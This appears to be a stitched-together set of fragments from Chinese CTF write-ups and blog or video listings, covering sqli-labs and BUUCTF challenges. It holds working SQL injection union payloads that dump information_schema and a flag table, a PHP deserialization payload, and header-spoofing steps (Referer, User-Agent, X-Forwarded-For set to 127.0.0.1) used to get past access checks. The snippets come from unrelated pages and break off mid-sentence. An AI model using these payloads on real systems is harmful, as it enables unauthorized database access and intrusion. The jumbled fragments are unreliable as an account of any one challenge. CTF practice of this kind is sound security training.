id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'--+ ?id=0' union select 1,2,group_concat(flag) from ctftraining.flag--+ __EOF__
82 -- 1:17 App sqlilabs-less1-4简单的闭合(自用) 211 -- 16:15 App xssaq.com/yx/level1-10(各种XSS绕过姿势) 635 1 1:42 App 【风二西工具】BF文件分离_一把梭 516 -- 1:01 App 为什么黑客不上班,收入还那么高? 341 -- 1:43 App 零基础想打CTF比赛,看完这个视频就够了 364 -...
82 -- 1:17 App sqlilabs-less1-4简单的闭合(自用) 516 -- 1:01 App 为什么黑客不上班,收入还那么高? 466 6 0:23 App 假如你从12月17日开始学习黑客技术,能在过年前学会并实战吗?(网络安全) 203 1 6:46 App BUUCTF/N1BOOK[第二章 web进阶]文件上传(zip路径穿越+1.php.xxx) 517 -- 0:54...
https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html 4、sqli(即SQL注入)的联合注入有以下特性 在使用联合注入时,如果你查询的数据不存在,那么就会生成一个内容为null的虚拟数据, 也就是说在联合查询并不存在的数据时,联合查询就会...
5. 6. 7. 8. 9. 10. 11. 再补一个在网上看到的脚本,感觉更好一点 s='填写16进制数据' import binascii out=open('2.jpg','wb') out.write(binascii.unhexlify(s)) out.close() 1. 2. 3. 4. 5. 在这个流中还发现了传输了一个hello.zip ...
5. (4)pickle.loads(string) 函数的功能:从string中读出序列化前的obj对象。 参数讲解: string:文件名称。 1. 2. 3. 附:Pickle协议 WP部分 第一步找到lv6 根据提示需要我们找到lv6,分析网址发现只需要有lv6.png即可 这里写个多线程的python脚本 ...
GET部分:?pleaseget=1POST部分:pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;} 提交payload得到flag 7、sqli-labs / Less-1 ?id=0' union select1,2,group_concat(schema_name)from information_schema.schemata--+ ...
上一篇CTF_复现(部分) | DASCTF X HDCTF 2024 下一篇【Loading 16/75】Web_SQLi-Labs_WriteUp 本文作者:Guanz的博客 本文链接:https://www.cnblogs.com/Guanz/p/18297444 版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。 关注我 收藏该文 0 0 posted...
可以发现有一个calc.php,输入的算式会被传入到这个php文件里,尝试一下能不能打开 可以打开,并且显示了源码 foreach 语法结构提供了遍历数组的简单方式。 语 阅读全文 » [BUUCTF] MISC-九连环 发表于 2020-07-14 11:36阅读:4408评论:0推荐:0 摘要:#0x01 知识点 伪加密 steghide提取信息 #0x02 伪加密的...
点开页面,先查看源码,发现secret.php文件 访问secret.php页面后提示我们没有从https://www.Sycseret.com访问 使用burpsuite抓包,在包中增加referer:https://www.Sycsecret.com 提示要使用Syclover浏览器,所以在包中user-agent字段修改浏览器为Syclover 提示要从本地访问,所以添加X-Forwarded-For:127.0.0.1字段修改访...